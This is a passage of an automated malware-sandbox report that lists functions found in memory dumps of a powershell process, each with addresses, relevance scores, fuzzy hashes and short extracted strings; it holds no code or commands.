Opcode Fuzzy Hash: a63e5c7a6cbab10f8387d5a7e60877753e009bbc585080abba73631ec21ac4d0
Instruction Fuzzy Hash: DD11C2357081508FC7069B2CE45846C7FA7EFCE225B5584EBE105DB76ACB74EC0687A2

Function 0474F51B Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652128801.000000000474D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0474D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_474d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
Instruction ID: 1080a650c0ce93a051e38953115465e3dedb3956d8e88f533996b7181fa6ff0c
Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
Instruction Fuzzy Hash: CB218E76504240DFCF06CF14D5C4B25BF62FB88314F24C5A9D9094A656C336D45ADBA2

Function 047EFF20 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14e98a0df35803c6cd651da8e00b3ead9ad1d16796bf77ead83f99d35167f7eb
Instruction ID: 125129657c5d435692273fc2cbd9f7dd13e77bbce4e6cc9fdc04e702516f7661
Opcode Fuzzy Hash: 14e98a0df35803c6cd651da8e00b3ead9ad1d16796bf77ead83f99d35167f7eb
Instruction Fuzzy Hash: 0D1176B59002488FDB10DFAAC4456EEFFF4EF89320F20842AD559A7300CB38A945CFA1

Function 047EFF28 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b6d2fb8b202c132fe155ab4370b3ae78684c0b9e3f7c7ffbc624b0ab7138cd6
Instruction ID: afbe9385294d9f7eb02e077c2bd6647ec77d639a05f8a04a8eaf5efb1fec4f16
Opcode Fuzzy Hash: 4b6d2fb8b202c132fe155ab4370b3ae78684c0b9e3f7c7ffbc624b0ab7138cd6
Instruction Fuzzy Hash: FD1146B19002488FDB10DFAAC4456EEFFF5EF89324F208419D419A7240CB39A544CBA0

Function 0474F60F Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652128801.000000000474D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0474D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_474d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e04e90d634e2f936e694f76980dc6fbe978928d934a7debcaa3b663106d0730
Instruction ID: df3ff0b3c6495b93b360ad048a0daa6865350f7c74edb3c238245c6265a9ffee
Opcode Fuzzy Hash: 1e04e90d634e2f936e694f76980dc6fbe978928d934a7debcaa3b663106d0730
Instruction Fuzzy Hash: 6311E0B5504284CFDB05CF24D6C4B25BBA1FB88314F24C6AEC8494B762C33AE44ACB52

Function 047EA99B Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e03f22805836cfc26980201ed0d27e6f600cd69cdabcded9f937ee6f1f9af564
Instruction ID: d0f5292dfee606238583dcf46d0fad1b0feb296cda3c704e52898063bdc9b8f1
Opcode Fuzzy Hash: e03f22805836cfc26980201ed0d27e6f600cd69cdabcded9f937ee6f1f9af564
Instruction Fuzzy Hash: 19018F78B002189FCB04DB99D480AADF771FF8E304B208259D95A97321CB35EC43DB50

Function 0474D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652128801.000000000474D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0474D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_474d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff26de63e3e14567f8430a2516036ec0e699fed3e0c629f9ec30e2f385fab66a
Instruction ID: 0115f0e1ed81c2cec6bbdc2fe411e0c4a9c7a6e3d0bd76dc53aacdf78cf6a526
Opcode Fuzzy Hash: ff26de63e3e14567f8430a2516036ec0e699fed3e0c629f9ec30e2f385fab66a
Instruction Fuzzy Hash: BF01F7311043009AE7308E16D984B77BF9CEF85320F18C92AED890B356C379A842CAB1

Function 0474D005 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652128801.000000000474D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0474D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_474d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc4325885d8f3fc388feb0f2cbd16e56ebac318499e154dcbb854a491a5ca830
Instruction ID: 6366484b761fcb882b1934382b7cfb588cbb60fee8a34615df764fb4980138cc
Opcode Fuzzy Hash: cc4325885d8f3fc388feb0f2cbd16e56ebac318499e154dcbb854a491a5ca830
Instruction Fuzzy Hash: 4B01406100E3C09EE7128B259894A62BFB8EF43224F1DC5DBD9888F2A7C2695845C772

Function 047EF510 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5916e2aa3888cdf8b817ced1aa5a968d7add052e74bb94a811d83909cd9074b3
Instruction ID: 13aa39f7acdd7f0b85d569e31e5b4adf859916fe78ff5d3f4b6ab018b9740b26
Opcode Fuzzy Hash: 5916e2aa3888cdf8b817ced1aa5a968d7add052e74bb94a811d83909cd9074b3
Instruction Fuzzy Hash: D901F4357001104F8719AB39A41803D3BA7EFDD622314806EE80ADB7AACF34EC018791

Function 047EF520 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69905adfdb2ebe3e1b3ebe48d016f1651a46e0bcda44cecf0e13e542c179305d
Instruction ID: 3becfca47ce2593d696458f1e83ff649c9e4cc79216cd5a383ed72e273824aad
Opcode Fuzzy Hash: 69905adfdb2ebe3e1b3ebe48d016f1651a46e0bcda44cecf0e13e542c179305d
Instruction Fuzzy Hash: 7AF090353005104F8B09AB28A01843D3BABEFDDA32310801EE80BDB76ACF34DC028B91

Function 047EFDCC Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b063f31822e68bb545d45debb7ec8437bdf6c893c0a59e62790959a96e764f47
Instruction ID: 2786a60c8378f4013902366a5e287e83e604692603037d51efac753803e66f22
Opcode Fuzzy Hash: b063f31822e68bb545d45debb7ec8437bdf6c893c0a59e62790959a96e764f47
Instruction Fuzzy Hash: F0E04F70D042099F8740EFB998415A9FFF0AF19200B20C5AFC918E7301E73156528BD1

Function 047EFDD8 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2652296677.00000000047E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_47e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction ID: dd80cb143a522235719ddb0b78094dd60a6f360208576e40946efdbff9a962aa
Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
Instruction Fuzzy Hash: 66D06270D042099F8780EFBDC94156DFBF4EB59200F5085AEC919D7301F73156128BD1

Non-executed Functions

Function 076616D0 Relevance: 14.2, Strings: 11, Instructions: 483COMMON

Download Yara Rule

Strings

tP]q, xrefs: 0766174D
4']q, xrefs: 07661941
5l, xrefs: 076617C5
tP]q, xrefs: 07661759
5l, xrefs: 07661C6E
$]q, xrefs: 076616E2
$]q, xrefs: 07661714
5l, xrefs: 076617B7
$]q, xrefs: 07661708
4']q, xrefs: 07661937
5l, xrefs: 07661C60

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$5l$5l$5l$5l
API String ID: 0-2194505327
Opcode ID: e75c7a6117e44e45ed116920be77056ec9064f31cb9a9f8ec58d5c856de2d576
Instruction ID: a16aa55444c12d1272f2d3d65da8e90c8c6a441e6faf271ea1e5be2527a4fdd7
Opcode Fuzzy Hash: e75c7a6117e44e45ed116920be77056ec9064f31cb9a9f8ec58d5c856de2d576
Instruction Fuzzy Hash: 4EF128B5B042098FCB188B78C4156AABBF6EFC3220F54847AD956CB351DB35DC46CBA1

Function 0766EDD0 Relevance: 14.0, Strings: 11, Instructions: 232COMMON

Download Yara Rule

Strings

4']q, xrefs: 0766F047
d%cq, xrefs: 0766EFD3
84=l, xrefs: 0766EF57
84=l, xrefs: 0766EF61
d%cq, xrefs: 0766EF6F
tP]q, xrefs: 0766EFA9
tP]q, xrefs: 0766EFB5
$]q, xrefs: 0766EE90
4']q, xrefs: 0766F053
d%cq, xrefs: 0766F012
d%cq, xrefs: 0766EFDD

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$84=l$84=l$d%cq$d%cq$d%cq$d%cq$tP]q$tP]q$$]q
API String ID: 0-3537806935
Opcode ID: 5115a3d2c619bd24878f6911fc9fe9010b424a06652049d67de1628260f7fb0d
Instruction ID: 0576ac5d1b243adfb9ce954c65a0bb9705eacd2022f1ee104ffd8e9d736efa57
Opcode Fuzzy Hash: 5115a3d2c619bd24878f6911fc9fe9010b424a06652049d67de1628260f7fb0d
Instruction Fuzzy Hash: D18150B5B00215DFCB249F38D558AAABBF6FF85710F948456E8028B391CB36DC45CBA1

Function 07669F90 Relevance: 12.9, Strings: 10, Instructions: 435COMMON

Download Yara Rule

Strings

,S?l, xrefs: 0766A0B0
xS?l, xrefs: 07669FE6
4']q, xrefs: 0766A268
4']q, xrefs: 0766A407
4']q, xrefs: 0766A25E
4']q, xrefs: 0766A0C5
4']q, xrefs: 0766A0CF
,S?l, xrefs: 0766A0A4
4']q, xrefs: 0766A3FB
d5/k, xrefs: 0766A096

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: ,S?l$,S?l$4']q$4']q$4']q$4']q$4']q$4']q$d5/k$xS?l
API String ID: 0-49618603
Opcode ID: 730bb2cf61ad87bf5417a1b83a8058dbe0cc32f47abe2f4d6ed36dc3e6346c99
Instruction ID: b477eb5645e285d9557191b1f684cfd3d77b81a5041e79c8f523e8770f720ae7
Opcode Fuzzy Hash: 730bb2cf61ad87bf5417a1b83a8058dbe0cc32f47abe2f4d6ed36dc3e6346c99
Instruction Fuzzy Hash: 97E14AF1B04205CFCB159BB8D85866AFBE6EF86210F58C46AC506EB351DA36CC46C7A1

Function 07660918 Relevance: 12.8, Strings: 10, Instructions: 320COMMON

Download Yara Rule

Strings

#/k, xrefs: 076609E7
tP]q, xrefs: 07660B71
tP]q, xrefs: 07660B65
$]q, xrefs: 07660B2C
4']q, xrefs: 07660A1B
$]q, xrefs: 07660B20
5l, xrefs: 07660BDD
5l, xrefs: 07660BCF
4']q, xrefs: 07660A27
$]q, xrefs: 07660AFA

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$#/k$$]q$$]q$$]q$5l$5l
API String ID: 0-4241111048
Opcode ID: eac5cf04a2120d4896dc9ee90d4d2f92663fca708f25e2acbbbb9664fcedf7fa
Instruction ID: 8b7b21c4a102aad56bd3c9174a520a5471b5b9bc4daaa6d1b209054d9c18bccb
Opcode Fuzzy Hash: eac5cf04a2120d4896dc9ee90d4d2f92663fca708f25e2acbbbb9664fcedf7fa
Instruction Fuzzy Hash: 5FA189B23043568FC7254A398418A7ABBF6EFC2610F58847BD546CB352DB36DC46C7A1

Function 0766E1F0 Relevance: 12.8, Strings: 10, Instructions: 284COMMON

Download Yara Rule

Strings

$]q, xrefs: 0766E296
4']q, xrefs: 0766E328
4']q, xrefs: 0766E527
4']q, xrefs: 0766E31C
4']q, xrefs: 0766E533
$]q, xrefs: 0766E4AE
$]q, xrefs: 0766E2FB
$]q, xrefs: 0766E509
$]q, xrefs: 0766E4F9
$]q, xrefs: 0766E2EB

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-267665775
Opcode ID: e9116eb5b789335f562ce9495bba2fc55516acad98ed065c001a3120338f4d01
Instruction ID: 64b205c143d864196ca1599a9532dfb0267554212628741ab4cb130a1915d058
Opcode Fuzzy Hash: e9116eb5b789335f562ce9495bba2fc55516acad98ed065c001a3120338f4d01
Instruction Fuzzy Hash: 36A146B870020ADFCB298F78C4485AA7BA6FF81210F94C46AE8578F355D737C946CB91

Function 0766AFC8 Relevance: 11.7, Strings: 9, Instructions: 408COMMON

Download Yara Rule

Strings

$]q, xrefs: 0766B08B
4']q, xrefs: 0766B334
4']q, xrefs: 0766B328
$]q, xrefs: 0766B07F
$]q, xrefs: 0766B40D
$]q, xrefs: 0766B06F
$]q, xrefs: 0766B03B
$]q, xrefs: 0766B01F
$]q, xrefs: 0766B063

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1075689143
Opcode ID: facb9638b412f2a00b638f37fa2c9f26aab42c905abbfdd030ad348d14edc5b6
Instruction ID: 9dd5ae0d34a09ff75973754d9db5b69d4dd6d3e0cd01eb772b686f3d9351a86f
Opcode Fuzzy Hash: facb9638b412f2a00b638f37fa2c9f26aab42c905abbfdd030ad348d14edc5b6
Instruction Fuzzy Hash: E0D139F0704346DFCB259F78C45867ABBE6AF82200F64847AD94ACB352DA35CC46C7A1

Function 0766ABF9 Relevance: 10.2, Strings: 8, Instructions: 169COMMON

Download Yara Rule

Strings

$]q, xrefs: 0766AC51
$]q, xrefs: 0766AD5E
tP]q, xrefs: 0766ACDF
tP]q, xrefs: 0766ACD3
$]q, xrefs: 0766AC35
4']q, xrefs: 0766AD83
$]q, xrefs: 0766AD4E
4']q, xrefs: 0766AD8F

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$tP]q$tP]q$$]q$$]q$$]q$$]q
API String ID: 0-1910532044
Opcode ID: 0b1eaf8a777fe9fd187c714b479d9b63528123bb9ab08a08f4623122b63ca355
Instruction ID: 3b231864390149e2f44542c9bc092bf40a87fea3a5ba1c2896dcfbff3d394879
Opcode Fuzzy Hash: 0b1eaf8a777fe9fd187c714b479d9b63528123bb9ab08a08f4623122b63ca355
Instruction Fuzzy Hash: FE5128B17001059FCB298FA8C55866AB7A2FF85711F54C46AD953AF351CB31CC42CF91

Function 0766F2F3 Relevance: 10.2, Strings: 8, Instructions: 155COMMON

Download Yara Rule

Strings

4']q, xrefs: 0766F556
TQbq, xrefs: 0766F352
84=l, xrefs: 0766F414
tP]q, xrefs: 0766F466
$]q, xrefs: 0766F394
$]q, xrefs: 0766F524
$]q, xrefs: 0766F373
TQbq, xrefs: 0766F4FA

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$84=l$TQbq$TQbq$tP]q$$]q$$]q$$]q
API String ID: 0-1616983152
Opcode ID: ba9e06877950ac6a814a980734ca0f8e658c0089f4c94dab61577a16c9d21cf9
Instruction ID: 7b2f92fe795547fa95bf6eb02ec56069c74a349c66e1908088e0d4a41187c7c5
Opcode Fuzzy Hash: ba9e06877950ac6a814a980734ca0f8e658c0089f4c94dab61577a16c9d21cf9
Instruction Fuzzy Hash: 2D51C0B1600206DBCB24CE29E14CAEA77E1BF45311F94846AE807AB795C772DE85CB91

Function 0766E6C0 Relevance: 9.1, Strings: 7, Instructions: 367COMMON

Download Yara Rule

Strings

(o]q, xrefs: 0766E7A6
$]q, xrefs: 0766F1A3
$]q, xrefs: 0766F1DD
(o]q, xrefs: 0766E7B6
4']q, xrefs: 0766F209
$]q, xrefs: 0766F1E9
4']q, xrefs: 0766F215

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: (o]q$(o]q$4']q$4']q$$]q$$]q$$]q
API String ID: 0-177558730
Opcode ID: 3de314120278266e18d479adceb0f217f9be99f70ee6997f3a5abfb6cacc68b0
Instruction ID: af81b4d265d958101551d96cc365e684cd910155804b51db4cb42226a74a83b0
Opcode Fuzzy Hash: 3de314120278266e18d479adceb0f217f9be99f70ee6997f3a5abfb6cacc68b0
Instruction Fuzzy Hash: AEC16DB9704306CFCB258E79D4586AABBE5FF81210F94847AD506CB390DB36D846CBA1

Function 07669B98 Relevance: 9.0, Strings: 7, Instructions: 258COMMON

Download Yara Rule

Strings

p5/k, xrefs: 07669D67
,S?l, xrefs: 07669D75
tP]q, xrefs: 07669C3C
xS?l, xrefs: 07669BAC
tP]q, xrefs: 07669C48
,S?l, xrefs: 07669D81
xS?l, xrefs: 07669D43

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: ,S?l$,S?l$p5/k$tP]q$tP]q$xS?l$xS?l
API String ID: 0-2652570315
Opcode ID: c0996bff71a0d8455919f8b1473472d7d56401f68d33d0439c87b4ee50ab1273
Instruction ID: 9bcfca2a97f925386e39be0a916d62fe415b719994fec168283ac1b8d7013bfa
Opcode Fuzzy Hash: c0996bff71a0d8455919f8b1473472d7d56401f68d33d0439c87b4ee50ab1273
Instruction Fuzzy Hash: 7F8149B5B043459FC7208B38840976ABFE6EF86310F44847FDA4ACB351CA31E845CBA2

Function 0766EDB0 Relevance: 8.9, Strings: 7, Instructions: 164COMMON

Download Yara Rule

Strings

4']q, xrefs: 0766F047
d%cq, xrefs: 0766EFD3
84=l, xrefs: 0766EF57
d%cq, xrefs: 0766EF6F
tP]q, xrefs: 0766EFA9
$]q, xrefs: 0766EE90
d%cq, xrefs: 0766EFDD

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$84=l$d%cq$d%cq$d%cq$tP]q$$]q
API String ID: 0-2771771429
Opcode ID: 57a39d27d7ff13a5faca9c93dff374a92d07209ed3652f6f6a1b54b9a9d398b1
Instruction ID: f24f90de595a49d9a99ab387f5b3967a226f0cddf319bca0a1196eedf514ef9c
Opcode Fuzzy Hash: 57a39d27d7ff13a5faca9c93dff374a92d07209ed3652f6f6a1b54b9a9d398b1
Instruction Fuzzy Hash: D65108B9A04245DFCB24CF34C598AAABBF2BF45710F988456E8069B391C737DC45CBA1

Function 0766ED58 Relevance: 8.9, Strings: 7, Instructions: 161COMMON

Download Yara Rule

Strings

4']q, xrefs: 0766F047
d%cq, xrefs: 0766EFD3
84=l, xrefs: 0766EF57
d%cq, xrefs: 0766EF6F
tP]q, xrefs: 0766EFA9
$]q, xrefs: 0766EE90
d%cq, xrefs: 0766EFDD

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$84=l$d%cq$d%cq$d%cq$tP]q$$]q
API String ID: 0-2771771429
Opcode ID: a41a5660be7d23ef8168d4ce76be84eeb866104633c8f08166af04eb238913b3
Instruction ID: 1465e38dc179dd241b86d8fe291369644218c64c9b3c7dcef6002bf41a731323
Opcode Fuzzy Hash: a41a5660be7d23ef8168d4ce76be84eeb866104633c8f08166af04eb238913b3
Instruction Fuzzy Hash: 9F5128B9604245DFCB24CF34C598AAABBF2BF45710F998496E8029B391C737DC45CBA1

Function 0766E070 Relevance: 7.6, Strings: 6, Instructions: 132COMMON

Download Yara Rule

Strings

84=l, xrefs: 0766E0D0
4']q, xrefs: 0766E0E9
tP]q, xrefs: 0766E13F
4']q, xrefs: 0766E0F5
tP]q, xrefs: 0766E14B
84=l, xrefs: 0766E0DA

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$84=l$84=l$tP]q$tP]q
API String ID: 0-2027059625
Opcode ID: 27d3b852561f081531e95bc1db45f65f5f00560007e47daa3a18e8bb47ac46fa
Instruction ID: 0fd00d764a4f47c7ac49ce909d78403f166af3af3f46858aba890212721e50f7
Opcode Fuzzy Hash: 27d3b852561f081531e95bc1db45f65f5f00560007e47daa3a18e8bb47ac46fa
Instruction Fuzzy Hash: A84155B9B00205CFC7259B689848666FBF6FFC1610F54C4AAC5068F345CB36DC46C7A2

Function 0766EEF6 Relevance: 7.6, Strings: 6, Instructions: 85COMMON

Download Yara Rule

Strings

4']q, xrefs: 0766F047
d%cq, xrefs: 0766EFD3
84=l, xrefs: 0766EF57
d%cq, xrefs: 0766EF6F
tP]q, xrefs: 0766EFA9
d%cq, xrefs: 0766EFDD

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$84=l$d%cq$d%cq$d%cq$tP]q
API String ID: 0-3941415517
Opcode ID: 3acefef940f1b8c38f717c7026b4309bab4b4de7031219c3df9f0881470e10cd
Instruction ID: b817518b19579da9f98e9b833b8485350801d6d193a9eb0840bb3801a43f8e34
Opcode Fuzzy Hash: 3acefef940f1b8c38f717c7026b4309bab4b4de7031219c3df9f0881470e10cd
Instruction Fuzzy Hash: 2231C4B4B00105DFCB24DF68C598E9ABBF2BF88710FA98556E8069B350C772DC01CB91

Function 0766FA57 Relevance: 6.5, Strings: 5, Instructions: 206COMMON

Download Yara Rule

Strings

tP]q, xrefs: 0766FB5A
tP]q, xrefs: 0766FB66
84=l, xrefs: 0766FB07
84=l, xrefs: 0766FB11
$]q, xrefs: 0766FAD5

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 84=l$84=l$tP]q$tP]q$$]q
API String ID: 0-2256730117
Opcode ID: 5c8288686e40f5577b6ae83dea4fb628252b6ed529003c49f1a0fec106b1b000
Instruction ID: 66eff0a198939cab10275e3d403569af64d39848becdfa99f8700123dd2cc89f
Opcode Fuzzy Hash: 5c8288686e40f5577b6ae83dea4fb628252b6ed529003c49f1a0fec106b1b000
Instruction Fuzzy Hash: 60712670B00105DFCB149F78E548AEABBF6AF89710F94C86AD8069B350CB32DC41CBA1

Function 07660538 Relevance: 6.4, Strings: 5, Instructions: 151COMMON

Download Yara Rule

Strings

$]q, xrefs: 076605C4
$]q, xrefs: 07660609
4']q, xrefs: 07660626
4']q, xrefs: 07660632
$]q, xrefs: 076605FD

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q$$]q
API String ID: 0-2353078639
Opcode ID: f0a145a45912967425694ee3a47a3752a8e7bc335f3c009b468f4a14b8ebec39
Instruction ID: 00c7d4caca6ca9d12977e7389b27b497e8ba5a21003a6bec055bd79a068db49b
Opcode Fuzzy Hash: f0a145a45912967425694ee3a47a3752a8e7bc335f3c009b468f4a14b8ebec39
Instruction Fuzzy Hash: FA4159B07043469FCB255B388918ABE7FA2DFC1210F94887AD946DB391DB35C946C7E2

Function 0766B4E0 Relevance: 5.3, Strings: 4, Instructions: 284COMMON

Download Yara Rule

Strings

4']q, xrefs: 0766B57A
4']q, xrefs: 0766B570
4']q, xrefs: 0766B6E1
4']q, xrefs: 0766B6D5

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: 54b53a2e9dfff1c11c57402e53e0253c5cd005c63e0f9d3e0048f015c202ab78
Instruction ID: c601b8604efeee30f06163d11dab93db4bb2edee5b9245917c3130ac05bdcbf0
Opcode Fuzzy Hash: 54b53a2e9dfff1c11c57402e53e0253c5cd005c63e0f9d3e0048f015c202ab78
Instruction Fuzzy Hash: 969116F570424ACFCB158F7C94186AABFA59F86320F6884ABC55ACB365DB31CC42C791

Function 07665DF8 Relevance: 5.3, Strings: 4, Instructions: 278COMMON

Download Yara Rule

Strings

tP]q, xrefs: 07665F36
84=l, xrefs: 07665EDD
84=l, xrefs: 07665ED3
tP]q, xrefs: 07665F2A

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
String ID: 84=l$84=l$tP]q$tP]q
API String ID: 0-245837689
Opcode ID: 4ccca24e7c98bff6d80b650a7a6b6de845def6036a0f567e5b372edc9bd0e56e
Instruction ID: 1b19dbaa1013e38f57a069a6619729e9b5d355618d942d148b5eb976e043e61f
Opcode Fuzzy Hash: 4ccca24e7c98bff6d80b650a7a6b6de845def6036a0f567e5b372edc9bd0e56e
Instruction Fuzzy Hash: 12916AB17002459FCB189E79C59566ABBE6EF85700F58887AD847CB392CB32DC41C7A1

Function 076681A8 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(f?l, xrefs: 0766831D
(f?l, xrefs: 076682A9
(f?l, xrefs: 07668327
(f?l, xrefs: 0766829F

Memory Dump Source

Source File: 00000002.00000002.2659848461.0000000007660000.00000040.00000800.00020000.00000000.sdmp, Offset: 07660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7660000_powershell.jbxd

Similarity

API ID:
